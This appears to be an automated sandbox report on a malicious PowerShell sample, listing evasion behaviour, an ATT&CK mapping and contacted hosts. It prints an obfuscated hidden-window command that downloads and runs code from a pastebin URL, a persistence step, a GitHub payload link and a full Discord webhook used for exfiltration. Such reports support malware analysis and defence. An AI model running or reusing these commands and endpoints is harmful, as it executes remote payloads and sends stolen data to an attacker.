Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3885Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6010Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1306Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3977Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5817Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1357
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6594
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3129
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6116Thread sleep time: -11990383647911201s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 600Thread sleep count: 1306 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3096Thread sleep count: 145 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5884Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3688Thread sleep count: 3977 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3688Thread sleep count: 5817 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080Thread sleep time: -23058430092136925s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1892Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4236Thread sleep count: 1357 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3508Thread sleep count: 142 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6888Thread sleep count: 324 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4024Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7828Thread sleep count: 6594 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7912Thread sleep count: 3129 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4576Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4828Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: powershell.exe, 00000007.00000002.1868361075.000001D219ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllP
Source: powershell.exe, 0000000C.00000002.1966785889.0000020ADDDF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%
Source: powershell.exe, 00000000.00000002.1718694511.0000027120A89000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft OneDrive\FileSync VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts111
Windows Management Instrumentation		11
Registry Run Keys / Startup Folder		11
Process Injection		1
Masquerading		OS Credential Dumping111
Security Software Discovery		Remote Services1
Archive Collected Data		1
Web Service		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
PowerShell		1
DLL Side-Loading		11
Registry Run Keys / Startup Folder		131
Virtualization/Sandbox Evasion		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable Media11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading		11
Process Injection		Security Account Manager131
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture4
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
File and Directory Discovery		SSHKeylogging15
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials12
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1534233 Sample: gabe.ps1 Startdate: 15/10/2024 Architecture: WINDOWS Score: 84 37 pastebin.com 2->37 39 raw.githubusercontent.com 2->39 41 discord.com 2->41 51 Suricata IDS alerts for network traffic 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 Sigma detected: Suspicious PowerShell Parameter Substring 2->55 57 AI detected suspicious sample 2->57 8 powershell.exe 1 22 2->8         started        13 forfiles.exe 1 2->13         started        15 forfiles.exe 1 2->15         started        signatures3 59 Connects to a pastebin service (likely for C&C) 37->59 process4 dnsIp5 43 discord.com 162.159.137.232, 443, 49710, 49716 CLOUDFLARENETUS United States 8->43 35 C:\ProgramData\...\BeginSync.lnk, MS 8->35 dropped 63 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->63 65 Suspicious powershell command line found 8->65 67 Tries to open files direct via NTFS file id 8->67 69 Powershell creates an autostart link 8->69 17 conhost.exe 8->17         started        19 attrib.exe 1 8->19         started        21 powershell.exe 7 13->21         started        24 conhost.exe 1 13->24         started        26 powershell.exe 15->26         started        28 conhost.exe 1 15->28         started        file6 signatures7 process8 signatures9 61 Suspicious powershell command line found 21->61 30 powershell.exe 14 13 21->30         started        33 powershell.exe 26->33         started        process10 dnsIp11 45 raw.githubusercontent.com 185.199.109.133, 443, 49709, 49711 FASTLYUS Netherlands 30->45 47 pastebin.com 104.20.3.235, 443, 49707, 49708 CLOUDFLARENETUS United States 30->47 49 104.20.4.235, 443, 49712, 49713 CLOUDFLARENETUS United States 33->49

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
gabe.ps13%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
discord.com
162.159.137.232
truetrue
    		unknown
    raw.githubusercontent.com
    		185.199.109.133
    		truetrue
      		unknown
      pastebin.com
      		104.20.3.235
      		truetrue
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
          		unknown
          https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
            		unknown
            https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5true
              		unknown
              http://pastebin.com/raw/sA04Mwk2false
                		unknown
                https://pastebin.com/raw/sA04Mwk2false
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGMpowershell.exe, 00000007.00000002.1822947062.000001D20272F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC6454000.00000004.00000800.00020000.00000000.sdmptrue
                    		unknown
                    http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1713569530.0000027118768000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1713569530.00000271188AA000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://discord.compowershell.exe, 00000000.00000002.1687945828.0000027108916000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1822947062.000001D203051000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1906348884.0000020AC6D2E000.00000004.00000800.00020000.00000000.sdmptrue
                      		unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1687945828.0000027108916000.00000004.00000800.00020000.00000000.sdmptrue
                      • URL Reputation: safe
                      		unknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1687945828.0000027108916000.00000004.00000800.00020000.00000000.sdmptrue
                        		unknown
